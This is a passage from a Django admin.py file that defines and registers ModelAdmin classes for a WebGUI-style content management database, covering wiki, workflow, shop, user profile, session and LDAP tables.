ThingyIkgQcHs3rCevOFoHUiU8kgAdmin(admin.ModelAdmin):\n\n list_display = (\n 'thing_data_id',\n 'date_created',\n 'created_by_id',\n 'updated_by_id',\n 'updated_by_name',\n 'last_updated',\n 'ip_address',\n 'field_bm1xw0ch6_xw_dmt_ssn_ny_ti_q',\n 'field_c_w_cwp_s3rr_dcld1_ck2_vz_wtw',\n 'field_es_k_aj8_dshl_miqdq_sw4i_ig',\n 'field_7_u_zt5dzr_q_yj_sm_w_epk_cf_xya',\n 'field_f_xc7_l2_rn_bqn8f_hej_ez3_ja',\n )\n\n\nclass ThingyThingAdmin(admin.ModelAdmin):\n\n list_display = (\n 'asset_id',\n 'thing_id',\n 'label',\n 'edit_screen_title',\n 'edit_instructions',\n 'group_id_add',\n 'group_id_edit',\n 'save_button_label',\n 'after_save',\n 'edit_template_id',\n 'on_add_workflow_id',\n 'on_edit_workflow_id',\n 'on_delete_workflow_id',\n 'group_id_view',\n 'view_template_id',\n 'default_view',\n 'search_screen_title',\n 'search_description',\n 'group_id_search',\n 'group_id_import',\n 'group_id_export',\n 'search_template_id',\n 'things_per_page',\n 'sort_by',\n 'display',\n 'export_meta_data',\n 'max_entries_per_user',\n )\n\n\nclass ThreadAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'replies',\n 'last_post_id',\n 'last_post_date',\n 'is_locked',\n 'is_sticky',\n 'subscription_group',\n 'revision_date',\n 'karma',\n 'karma_scale',\n 'karma_rank',\n 'thread_rating',\n )\n list_filter = ('subscription_group',)\n\n\nclass ThreadReadAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'thread_id', 'user')\n list_filter = ('user',)\n\n\nclass WeatherDataAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'locations',\n 'partner_id',\n 'license_key',\n )\n\n\nclass WikiMasterAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'group_to_edit_pages',\n 'group_to_administer',\n 'rich_editor',\n 'front_page_template_id',\n 'page_template_id',\n 'page_edit_template_id',\n 'recent_changes_template_id',\n 'most_popular_template_id',\n 'page_history_template_id',\n 'search_template_id',\n 'recent_changes_count',\n 'recent_changes_count_front',\n 'most_popular_count',\n 'most_popular_count_front',\n 'thumbnail_size',\n 'max_image_size',\n 'approval_workflow',\n 'use_content_filter',\n 'filter_code',\n 'by_keyword_template_id',\n 'allow_attachments',\n )\n\n\nclass WikiPageAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'content',\n 'views',\n 'is_protected',\n 'action_taken',\n 'action_taken_by',\n )\n\n\nclass WorkflowAdmin(admin.ModelAdmin):\n\n list_display = (\n 'workflow_id',\n 'title',\n 'description',\n 'enabled',\n 'type',\n 'mode',\n )\n\n\nclass WorkflowActivityAdmin(admin.ModelAdmin):\n\n list_display = (\n 'activity_id',\n 'workflow_id',\n 'title',\n 'description',\n 'sequence_number',\n 'class_name',\n )\n\n\nclass WorkflowActivityDataAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'activity_id', 'name', 'value')\n search_fields = ('name',)\n\n\nclass WorkflowInstanceAdmin(admin.ModelAdmin):\n\n list_display = (\n 'instance_id',\n 'workflow_id',\n 'current_activity_id',\n 'priority',\n 'class_name',\n 'method_name',\n 'parameters',\n 'running_since',\n 'last_update',\n 'last_status',\n 'no_session',\n )\n\n\nclass WorkflowInstanceScratchAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'instance_id', 'name', 'value')\n search_fields = ('name',)\n\n\nclass WorkflowScheduleAdmin(admin.ModelAdmin):\n\n list_display = (\n 'task_id',\n 'title',\n 'enabled',\n 'run_once',\n 'minute_of_hour',\n 'hour_of_day',\n 'day_of_month',\n 
'month_of_year',\n 'day_of_week',\n 'workflow_id',\n 'class_name',\n 'method_name',\n 'priority',\n 'parameters',\n )\n\n\nclass ZipArchiveAssetAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'show_page',\n 'revision_date',\n )\n\n\nclass AdSkuPurchaseAdmin(admin.ModelAdmin):\n\n list_display = (\n 'ad_sku_purchase_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'is_deleted',\n 'clicks_purchased',\n 'date_of_purchase',\n 'impressions_purchased',\n 'transaction_item_id',\n 'user',\n 'ad_id',\n 'stored_image',\n )\n list_filter = ('date_created', 'last_updated', 'user')\n\n\nclass AdSpaceAdmin(admin.ModelAdmin):\n\n list_display = (\n 'ad_space_id',\n 'name',\n 'title',\n 'description',\n 'cost_per_impression',\n 'minimum_impressions',\n 'cost_per_click',\n 'minimum_clicks',\n 'width',\n 'height',\n 'group_to_purchase',\n )\n search_fields = ('name',)\n\n\nclass AddressAdmin(admin.ModelAdmin):\n\n list_display = (\n 'address_id',\n 'address_book_id',\n 'label',\n 'first_name',\n 'last_name',\n 'address1',\n 'address2',\n 'address3',\n 'city',\n 'state',\n 'country',\n 'code',\n 'phone_number',\n 'organization',\n 'email',\n )\n\n\nclass AddressBookAdmin(admin.ModelAdmin):\n\n list_display = (\n 'address_book_id',\n 'session_id',\n 'user',\n 'default_address_id',\n )\n list_filter = ('user',)\n\n\nclass AdvertisementAdmin(admin.ModelAdmin):\n\n list_display = (\n 'ad_id',\n 'ad_space_id',\n 'owner_user',\n 'is_active',\n 'title',\n 'type',\n 'storage_id',\n 'ad_text',\n 'url',\n 'rich_media',\n 'border_color',\n 'text_color',\n 'background_color',\n 'clicks',\n 'clicks_bought',\n 'impressions',\n 'impressions_bought',\n 'priority',\n 'next_in_priority',\n 'rendered_ad',\n )\n list_filter = ('owner_user',)\n\n\nclass AnalyticRuleAdmin(admin.ModelAdmin):\n\n list_display = (\n 'rule_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'bucket_name',\n 'regexp',\n )\n list_filter = ('date_created', 'last_updated')\n\n\nclass AssetAdmin(admin.ModelAdmin):\n\n list_display = (\n 'asset_id',\n 'parent_id',\n 'lineage',\n 'state',\n 'class_name',\n 'creation_date',\n 'created_by',\n 'state_changed',\n 'state_changed_by',\n 'is_locked_by',\n 'is_system',\n 'last_exported_as',\n )\n\n\nclass AssetAspectCommentAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'comments',\n 'average_comment_rating',\n )\n\n\nclass AssetAspectMailableAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'mail_style_template_id',\n )\n\n\nclass AssetAspectRssFeedAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'items_per_feed',\n 'feed_copyright',\n 'feed_title',\n 'feed_description',\n 'feed_image',\n 'feed_image_link',\n 'feed_image_description',\n 'feed_header_links',\n )\n\n\nclass AssetAspectSubscriberAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'subscription_group',\n 'subscription_enabled',\n 'always_confirm_subscription',\n 'allow_anonymous_subscription',\n 'confirmation_required_template_id',\n 'confirmation_email_template_id',\n 'confirmation_email_subject',\n 'no_mutation_email_template_id',\n 'no_mutation_email_subject',\n 'list_name',\n 'confirm_mutation_template_id',\n )\n list_filter = ('subscription_group',)\n\n\nclass AssetAspectSubscriberLogAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'request_ip',\n 'request_date',\n 'confirmation_ip',\n 
'confirmation_date',\n 'user',\n 'email',\n 'type',\n 'anonymous',\n 'confirmed',\n 'code',\n )\n list_filter = ('user',)\n\n\nclass AssetDataAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'revised_by',\n 'tag_id',\n 'status',\n 'title',\n 'menu_title',\n 'url',\n 'owner_user',\n 'group_id_view',\n 'group_id_edit',\n 'synopsis',\n 'new_window',\n 'is_hidden',\n 'is_package',\n 'is_prototype',\n 'encrypt_page',\n 'asset_size',\n 'extra_head_tags',\n 'skip_notification',\n 'is_exportable',\n 'inherit_url_from_parent',\n 'last_modified',\n 'extra_head_tags_packed',\n 'use_packed_head_tags',\n )\n list_filter = ('owner_user',)\n\n\nclass AssetHistoryAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'user',\n 'date_stamp',\n 'action_taken',\n 'url',\n )\n list_filter = ('user',)\n\n\nclass AssetIndexAdmin(admin.ModelAdmin):\n\n list_display = (\n 'asset_id',\n 'title',\n 'synopsis',\n 'url',\n 'creation_date',\n 'revision_date',\n 'owner_user',\n 'group_id_view',\n 'group_id_edit',\n 'lineage',\n 'class_name',\n 'is_public',\n 'keywords',\n )\n list_filter = ('owner_user',)\n\n\nclass AssetKeywordAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'keyword', 'asset_id')\n\n\nclass AssetVersionTagAdmin(admin.ModelAdmin):\n\n list_display = (\n 'tag_id',\n 'name',\n 'is_committed',\n 'creation_date',\n 'created_by',\n 'commit_date',\n 'committed_by',\n 'is_locked',\n 'locked_by',\n 'group_to_use',\n 'workflow_id',\n 'workflow_instance_id',\n 'comments',\n 'start_time',\n 'end_time',\n 'is_site_wide',\n )\n list_filter = ('start_time', 'end_time')\n search_fields = ('name',)\n\n\nclass AuthenticationAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'user',\n 'auth_method',\n 'field_name',\n 'password_base64',\n )\n list_filter = ('user',)\n\n\nclass BucketLogAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'user', 'bucket', 'duration', 'time_stamp')\n list_filter = ('user', 'time_stamp')\n\n\nclass CacheAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'namespace',\n 'cachekey',\n 'expires',\n 'size',\n 'content',\n )\n\n\nclass CartAdmin(admin.ModelAdmin):\n\n list_display = (\n 'cart_id',\n 'session_id',\n 'shipping_address_id',\n 'shipper_id',\n 'pos_user',\n 'creation_date',\n )\n list_filter = ('pos_user',)\n\n\nclass CartItemAdmin(admin.ModelAdmin):\n\n list_display = (\n 'item_id',\n 'cart_id',\n 'asset_id',\n 'date_added',\n 'options',\n 'configured_title',\n 'shipping_address_id',\n 'quantity',\n )\n list_filter = ('date_added',)\n\n\nclass DatabaseLinkAdmin(admin.ModelAdmin):\n\n list_display = (\n 'database_link_id',\n 'title',\n 'dsn',\n 'username',\n 'identifier',\n 'allowed_keywords',\n 'allow_macro_access',\n 'additional_parameters',\n )\n\n\nclass DeltaLogAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'user', 'asset_id', 'delta', 'time_stamp', 'url')\n list_filter = ('user',)\n\n\nclass DonationAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'default_price',\n 'thank_you_message',\n 'template_id',\n )\n\n\nclass FilePumpBundleAdmin(admin.ModelAdmin):\n\n list_display = (\n 'bundle_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'bundle_name',\n 'last_modified',\n 'last_build',\n 'js_files',\n 'css_files',\n 'other_files',\n )\n list_filter = ('date_created', 'last_updated')\n\n\nclass FriendInvitationAdmin(admin.ModelAdmin):\n\n list_display = (\n 'invite_id',\n 'inviter_id',\n 'friend_id',\n 'date_sent',\n 'comments',\n 'message_id',\n )\n 
list_filter = ('date_sent',)\n\n\nclass GroupGroupingAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'group', 'in_group')\n list_filter = ('group',)\n\n\nclass GroupingAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'group', 'user', 'expire_date', 'group_admin')\n list_filter = ('group', 'user')\n\n\nclass GroupAdmin(admin.ModelAdmin):\n\n list_display = (\n 'id',\n 'name',\n 'description',\n 'expire_offset',\n 'karma_threshold',\n 'ip_filter',\n 'date_created',\n 'last_updated',\n 'delete_offset',\n 'expire_notify_offset',\n 'expire_notify_message',\n 'expire_notify',\n 'scratch_filter',\n 'auto_add',\n 'auto_delete',\n 'database_link_id',\n 'group_cache_timeout',\n 'db_query',\n 'is_editable',\n 'show_in_forms',\n 'ldap_group',\n 'ldap_group_property',\n 'ldap_recursive_property',\n 'ldap_link_id',\n 'ldap_recursive_filter',\n 'is_ad_hoc_mail_group',\n )\n raw_id_fields = ('users',)\n search_fields = ('name',)\n\n\nclass ImageColorAdmin(admin.ModelAdmin):\n\n list_display = (\n 'color_id',\n 'name',\n 'fill_triplet',\n 'fill_alpha',\n 'stroke_triplet',\n 'stroke_alpha',\n )\n search_fields = ('name',)\n\n\nclass ImageFontAdmin(admin.ModelAdmin):\n\n list_display = ('font_id', 'name', 'storage_id', 'filename')\n search_fields = ('name',)\n\n\nclass ImagePaletteAdmin(admin.ModelAdmin):\n\n list_display = ('palette_id', 'name')\n search_fields = ('name',)\n\n\nclass ImagePaletteColorAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'palette_id', 'color_id', 'palette_order')\n\n\nclass InboxAdmin(admin.ModelAdmin):\n\n list_display = (\n 'message_id',\n 'status',\n 'date_stamp',\n 'completed_on',\n 'completed_by',\n 'user',\n 'group',\n 'subject',\n 'message',\n 'sent_by',\n )\n list_filter = ('user', 'group')\n\n\nclass InboxMessageStateAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'message_id',\n 'user',\n 'is_read',\n 'replied_to',\n 'deleted',\n )\n list_filter = ('user',)\n\n\nclass IncrementerAdmin(admin.ModelAdmin):\n\n list_display = ('incrementer_id', 'next_value')\n\n\nclass KarmaLogAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'user',\n 'amount',\n 'source',\n 'description',\n 'date_modified',\n )\n list_filter = ('user',)\n\n\nclass LdapLinkAdmin(admin.ModelAdmin):\n\n list_display = (\n 'ldap_link_id',\n 'ldap_link_name',\n 'ldap_url',\n 'connect_dn',\n 'identifier',\n 'ldap_user_rdn',\n 'ldap_identity',\n 'ldap_identity_name',\n 'ldap_password_name',\n 'ldap_send_welcome_message',\n 'ldap_welcome_message',\n 'ldap_account_template',\n 'ldap_create_account_template',\n 'ldap_login_template',\n 'ldap_global_recursive_filter',\n )\n\n\nclass MailQueueAdmin(admin.ModelAdmin):\n\n list_display = ('message_id', 'message', 'to_group', 'is_inbox')\n\n\nclass MetaDataPropertiesAdmin(admin.ModelAdmin):\n\n list_display = (\n 'field_id',\n 'field_name',\n 'description',\n 'field_type',\n 'possible_values',\n 'default_value',\n )\n\n\nclass MetaDataValuesAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'field_id', 'value', 'asset_id')\n\n\nclass PassiveAnalyticsStatusAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'start_date', 'end_date', 'running', 'user')\n list_filter = ('start_date', 'end_date', 'user')\n\n\nclass PassiveLogAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'user',\n 'asset_id',\n 'session_id',\n 'time_stamp',\n 'url',\n )\n list_filter = ('user',)\n\n\nclass PassiveProfileAOIAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'user', 'field_id', 'value', 'count')\n list_filter = ('user',)\n\n\nclass 
PassiveProfileLogAdmin(admin.ModelAdmin):\n\n list_display = (\n 'passive_profile_log_id',\n 'user',\n 'session_id',\n 'asset_id',\n 'date_of_entry',\n )\n list_filter = ('user',)\n\n\nclass PaymentGatewayAdmin(admin.ModelAdmin):\n\n list_display = ('payment_gateway_id', 'class_name', 'options')\n\n\nclass RedirectAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'redirect_url',\n 'revision_date',\n 'redirect_type',\n )\n\n\nclass ReplacementsAdmin(admin.ModelAdmin):\n\n list_display = ('replacement_id', 'search_for', 'replace_with')\n\n\nclass SearchAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'class_limiter',\n 'search_root',\n 'template_id',\n 'use_containers',\n 'paginate_after',\n )\n\n\nclass SettingsAdmin(admin.ModelAdmin):\n\n list_display = ('name', 'value')\n search_fields = ('name',)\n\n\nclass ShipperAdmin(admin.ModelAdmin):\n\n list_display = ('shipper_id', 'class_name', 'options')\n\n\nclass ShopCreditAdmin(admin.ModelAdmin):\n\n list_display = (\n 'credit_id',\n 'user',\n 'amount',\n 'comment',\n 'date_of_adjustment',\n )\n list_filter = ('user', 'date_of_adjustment')\n\n\nclass SkuAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'description',\n 'sku',\n 'vendor',\n 'display_title',\n 'override_tax_rate',\n 'tax_rate_override',\n 'tax_configuration',\n 'ships_separately',\n )\n list_filter = ('vendor',)\n\n\nclass SnippetAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'snippet',\n 'process_as_template',\n 'mime_type',\n 'revision_date',\n 'cache_timeout',\n 'snippet_packed',\n 'use_packed',\n )\n\n\nclass TaxDriverAdmin(admin.ModelAdmin):\n\n list_display = ('class_name', 'options')\n\n\nclass TaxEuVatNumbersAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'user',\n 'country_code',\n 'vat_number',\n 'vies_validated',\n 'vies_error_code',\n 'approved',\n )\n list_filter = ('user',)\n\n\nclass TaxGenericRatesAdmin(admin.ModelAdmin):\n\n list_display = ('tax_id', 'country', 'state', 'city', 'code', 'tax_rate')\n\n\nclass TemplateAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'template',\n 'namespace',\n 'is_editable',\n 'show_in_forms',\n 'asset_id',\n 'revision_date',\n 'parser',\n 'is_default',\n 'template_packed',\n 'use_packed',\n )\n\n\nclass TemplateAttachmentsAdmin(admin.ModelAdmin):\n\n list_display = (\n 'template_id',\n 'revision_date',\n 'url',\n 'type',\n 'sequence',\n 'attach_id',\n )\n\n\nclass TransactionItemAdmin(admin.ModelAdmin):\n\n list_display = (\n 'item_id',\n 'transaction_id',\n 'asset_id',\n 'configured_title',\n 'options',\n 'shipping_address_id',\n 'shipping_name',\n 'shipping_address1',\n 'shipping_address2',\n 'shipping_address3',\n 'shipping_city',\n 'shipping_state',\n 'shipping_country',\n 'shipping_code',\n 'shipping_phone_number',\n 'shipping_tracking_number',\n 'order_status',\n 'last_updated',\n 'quantity',\n 'price',\n 'vendor',\n 'vendor_payout_status',\n 'vendor_payout_amount',\n 'tax_rate',\n 'tax_configuration',\n )\n list_filter = ('last_updated', 'vendor')\n\n\nclass UserLoginLogAdmin(admin.ModelAdmin):\n list_display = (\n u'id',\n 'user',\n 'status',\n 'time_stamp',\n 'ip_address',\n 'user_agent',\n 'session_id',\n 'last_page_viewed',\n )\n\n\nclass UserProfileCategoryAdmin(admin.ModelAdmin):\n\n list_display = (\n 'profile_category_id',\n 'label',\n 'short_label',\n 'sequence_number',\n 'visible',\n 'editable',\n 'protected',\n )\n\n\nclass UserProfileDataAdmin(admin.ModelAdmin):\n 
search_fields = ['email', 'first_name', 'last_name']\n raw_id_fields = ('user',)\n list_display = (\n 'user',\n 'email',\n 'first_name',\n 'middle_name',\n 'last_name',\n 'icq',\n 'aim',\n 'msn_im',\n 'yahoo_im',\n 'cell_phone',\n 'pager',\n 'email_to_pager',\n 'language',\n 'home_address',\n 'home_city',\n 'home_state',\n 'home_zip',\n 'home_country',\n 'home_phone',\n 'work_address',\n 'work_city',\n 'work_state',\n 'work_zip',\n 'work_country',\n 'work_phone',\n 'gender',\n 'birthdate',\n 'home_url',\n 'work_url',\n 'work_name',\n 'time_zone',\n 'date_format',\n 'time_format',\n 'discussion_layout',\n 'first_day_of_week',\n 'ui_level',\n 'alias',\n 'signature',\n 'public_profile',\n 'toolbar',\n 'photo',\n 'avatar',\n 'department',\n 'allow_private_messages',\n 'able_to_be_friend',\n 'show_message_on_login_seen',\n 'show_online',\n 'version_tag_mode',\n 'wg_privacy_settings',\n 'receive_inbox_email_notifications',\n 'receive_inbox_sms_notifications',\n )\n list_filter = ('user',)\n\n\nclass UserProfileFieldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'field_name',\n 'label',\n 'visible',\n 'required',\n 'field_type',\n 'possible_values',\n 'data_default',\n 'sequence_number',\n 'profile_category_id',\n 'protected',\n 'editable',\n 'force_image_only',\n 'show_at_registration',\n 'required_for_password_recovery',\n 'extras',\n 'default_privacy_setting',\n )\n\n\nclass UserSessionAdmin(admin.ModelAdmin):\n\n list_display = (\n 'session_id',\n 'expires',\n 'last_page_view',\n 'admin_on',\n 'last_ip',\n 'user',\n )\n list_filter = ('user',)\n\n\nclass UserSessionScratchAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'session_id', 'name', 'value')\n search_fields = ('name',)\n\n\nclass UserprefAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'username', 'preference', 'value')\n\n\nclass UserAdmin(admin.ModelAdmin):\n search_fields = ('username',)\n list_display = (\n 'id',\n 'username',\n 'auth_method',\n 'date_created',\n 'last_updated',\n 'karma',\n 'status',\n 'referring_affiliate',\n 'friends_group',\n )\n\n\nclass UsersSpecialStateAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'user', 'special_state')\n list_filter = ('user',)\n\n\nclass VendorAdmin(admin.ModelAdmin):\n\n list_display = (\n 'id',\n 'date_created',\n 'name',\n 'user',\n 'preferred_payment_type',\n 'payment_information',\n 'payment_address_id',\n 'url',\n )\n list_filter = ('date_created', 'user')\n search_fields = ('name',)\n\n\nclass WebguiVersionAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'webgui_version', 'version_type', 'date_applied')\n\n\nclass WobjectAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'display_title',\n 'description',\n 'asset_id',\n 'style_template_id',\n 'printable_style_template_id',\n 'revision_date',\n 'mobile_style_template_id',\n )\n\n\ndef _register(model, admin_class):\n admin.site.register(model, admin_class)\n\n\n_register(models.AdSku, AdSkuAdmin)\n_register(models.Article, ArticleAdmin)\n_register(models.Calendar, CalendarAdmin)\n_register(models.Carousel, CarouselAdmin)\n_register(models.DataForm, DataFormAdmin)\n_register(models.DataFormEntry, DataFormEntryAdmin)\n_register(models.DataTable, DataTableAdmin)\n_register(models.EMSBadge, EMSBadgeAdmin)\n_register(models.EMSBadgeGroup, EMSBadgeGroupAdmin)\n_register(models.EMSEventMetaField, EMSEventMetaFieldAdmin)\n_register(models.EMSRegistrant, EMSRegistrantAdmin)\n_register(models.EMSRegistrantRibbon, EMSRegistrantRibbonAdmin)\n_register(models.EMSRegistrantTicket, 
EMSRegistrantTicketAdmin)\n_register(models.EMSRegistrantToken, EMSRegistrantTokenAdmin)\n_register(models.EMSRibbon, EMSRibbonAdmin)\n_register(models.EMSTicket, EMSTicketAdmin)\n_register(models.EMSToken, EMSTokenAdmin)\n_register(models.Event, EventAdmin)\n_register(models.EventManagementSystem, EventManagementSystemAdmin)\n_register(models.EventRecur, EventRecurAdmin)\n_register(models.EventRelatedlink, EventRelatedlinkAdmin)\n_register(models.FileAsset, FileAssetAdmin)\n_register(models.FlatDiscount, FlatDiscountAdmin)\n_register(models.Folder, FolderAdmin)\n_register(models.Gallery, GalleryAdmin)\n_register(models.GalleryAlbum, GalleryAlbumAdmin)\n_register(models.GalleryFile, GalleryFileAdmin)\n_register(models.GalleryFileComment, GalleryFileCommentAdmin)\n_register(models.HttpProxy, HttpProxyAdmin)\n_register(models.ImageAsset, ImageAssetAdmin)\n_register(models.KBAuth, KBAuthAdmin)\n_register(models.Layout, LayoutAdmin)\n_register(models.MacroAttendEvent, MacroAttendEventAdmin)\n_register(models.Mailing, MailingAdmin)\n_register(models.MailingEmail, MailingEmailAdmin)\n_register(models.MailmanManager, MailmanManagerAdmin)\n_register(models.MailmanManagerGroupsInList, MailmanManagerGroupsInListAdmin)\n_register(models.MailmanManagerList, MailmanManagerListAdmin)\n_register(\n models.MailmanManagerSubscribeConfirmation,\n MailmanManagerSubscribeConfirmationAdmin)\n_register(models.Map, MapAdmin)\n_register(models.MapPoint, MapPointAdmin)\n_register(models.Matrix, MatrixAdmin)\n_register(models.MatrixListing, MatrixListingAdmin)\n_register(models.MatrixListingAttribute, MatrixListingAttributeAdmin)\n_register(models.MatrixListingRating, MatrixListingRatingAdmin)\n_register(models.MatrixListingRatingSummary, MatrixListingRatingSummaryAdmin)\n_register(models.MatrixAttribute, MatrixAttributeAdmin)\n_register(models.MessageBoard, MessageBoardAdmin)\n_register(models.MultiSearch, MultiSearchAdmin)\n_register(models.Navigation, NavigationAdmin)\n_register(models.Newsletter, NewsletterAdmin)\n_register(models.NewsletterCollection, NewsletterCollectionAdmin)\n_register(models.NewsletterSubscription, NewsletterSubscriptionAdmin)\n_register(models.PMProject, PMProjectAdmin)\n_register(models.PMTask, PMTaskAdmin)\n_register(models.PMTaskResource, PMTaskResourceAdmin)\n_register(models.PMWobject, PMWobjectAdmin)\n_register(models.Photo, PhotoAdmin)\n_register(models.PhotoRating, PhotoRatingAdmin)\n_register(models.Poll, PollAdmin)\n_register(models.PollAnswer, PollAnswerAdmin)\n_register(models.Post, PostAdmin)\n_register(models.PostRating, PostRatingAdmin)\n_register(models.Product, ProductAdmin)\n_register(models.RichEdit, RichEditAdmin)\n_register(models.SQLReport, SQLReportAdmin)\n_register(models.Shelf, ShelfAdmin)\n_register(models.Shortcut, ShortcutAdmin)\n_register(models.ShortcutOverride, ShortcutOverrideAdmin)\n_register(models.StockData, StockDataAdmin)\n_register(models.Story, StoryAdmin)\n_register(models.StoryArchive, StoryArchiveAdmin)\n_register(models.StoryTopic, StoryTopicAdmin)\n_register(models.Subscription, SubscriptionAdmin)\n_register(models.SubscriptionCode, SubscriptionCodeAdmin)\n_register(models.SubscriptionCodeBatch, SubscriptionCodeBatchAdmin)\n_register(models.Survey, SurveyAdmin)\n_register(models.SurveyAnswerOld, SurveyAnswerOldAdmin)\n_register(models.SurveyOld, SurveyOldAdmin)\n_register(models.SurveyQuestionResponseOld, SurveyQuestionResponseOldAdmin)\n_register(models.SurveyQuestionType, SurveyQuestionTypeAdmin)\n_register(models.SurveyQuestionOld, 
SurveyQuestionOldAdmin)\n_register(models.SurveyResponse, SurveyResponseAdmin)\n_register(models.SurveyResponseOld, SurveyResponseOldAdmin)\n_register(models.SurveySectionOld, SurveySectionOldAdmin)\n_register(models.SurveyTempReport, SurveyTempReportAdmin)\n_register(models.SurveyTest, SurveyTestAdmin)\n_register(models.SyndicatedContent, SyndicatedContentAdmin)\n_register(models.TTProjectList, TTProjectListAdmin)\n_register(models.TTProjectResourceList, TTProjectResourceListAdmin)\n_register(models.TTProjectTask, TTProjectTaskAdmin)\n_register(models.TTReport, TTReportAdmin)\n_register(models.TTTimeEntry, TTTimeEntryAdmin)\n_register(models.TTWobject, TTWobjectAdmin)\n_register(models.Thingy, ThingyAdmin)\n_register(models.ThingyRecord, ThingyRecordAdmin)\n_register(models.ThingyRecordRecord, ThingyRecordRecordAdmin)\n_register(models.ThingyField, ThingyFieldAdmin)\n_register(\n models.ThingyIkgQcHs3rCevOFoHUiU8kg,\n ThingyIkgQcHs3rCevOFoHUiU8kgAdmin)\n_register(models.ThingyThing, ThingyThingAdmin)\n_register(models.Thread, ThreadAdmin)\n_register(models.ThreadRead, ThreadReadAdmin)\n_register(models.WeatherData, WeatherDataAdmin)\n_register(models.WikiMaster, WikiMasterAdmin)\n_register(models.WikiPage, WikiPageAdmin)\n_register(models.Workflow, WorkflowAdmin)\n_register(models.WorkflowActivity, WorkflowActivityAdmin)\n_register(models.WorkflowActivityData, WorkflowActivityDataAdmin)\n_register(models.WorkflowInstance, WorkflowInstanceAdmin)\n_register(models.WorkflowInstanceScratch, WorkflowInstanceScratchAdmin)\n_register(models.WorkflowSchedule, WorkflowScheduleAdmin)\n_register(models.ZipArchiveAsset, ZipArchiveAssetAdmin)\n_register(models.AdSkuPurchase, AdSkuPurchaseAdmin)\n_register(models.AdSpace, AdSpaceAdmin)\n_register(models.Address, AddressAdmin)\n_register(models.AddressBook, AddressBookAdmin)\n_register(models.Advertisement, AdvertisementAdmin)\n_register(models.AnalyticRule, AnalyticRuleAdmin)\n_register(models.Asset, AssetAdmin)\n_register(models.AssetAspectComment, AssetAspectCommentAdmin)\n_register(models.AssetAspectMailable, AssetAspectMailableAdmin)\n_register(models.AssetAspectRssFeed, AssetAspectRssFeedAdmin)\n_register(models.AssetAspectSubscriber, AssetAspectSubscriberAdmin)\n_register(models.AssetAspectSubscriberLog, AssetAspectSubscriberLogAdmin)\n_register(models.AssetData, AssetDataAdmin)\n_register(models.AssetHistory, AssetHistoryAdmin)\n_register(models.AssetIndex, AssetIndexAdmin)\n_register(models.AssetKeyword, AssetKeywordAdmin)\n_register(models.AssetVersionTag, AssetVersionTagAdmin)\n_register(models.Authentication, AuthenticationAdmin)\n_register(models.BucketLog, BucketLogAdmin)\n_register(models.Cache, CacheAdmin)\n_register(models.Cart, CartAdmin)\n_register(models.CartItem, CartItemAdmin)\n_register(models.DatabaseLink, DatabaseLinkAdmin)\n_register(models.DeltaLog, DeltaLogAdmin)\n_register(models.Donation, DonationAdmin)\n_register(models.FilePumpBundle, FilePumpBundleAdmin)\n_register(models.FriendInvitation, FriendInvitationAdmin)\n_register(models.GroupGrouping, GroupGroupingAdmin)\n_register(models.Grouping, GroupingAdmin)\n_register(models.Group, GroupAdmin)\n_register(models.ImageColor, ImageColorAdmin)\n_register(models.ImageFont, ImageFontAdmin)\n_register(models.ImagePalette, ImagePaletteAdmin)\n_register(models.ImagePaletteColor, ImagePaletteColorAdmin)\n_register(models.Inbox, InboxAdmin)\n_register(models.InboxMessageState, InboxMessageStateAdmin)\n_register(models.Incrementer, 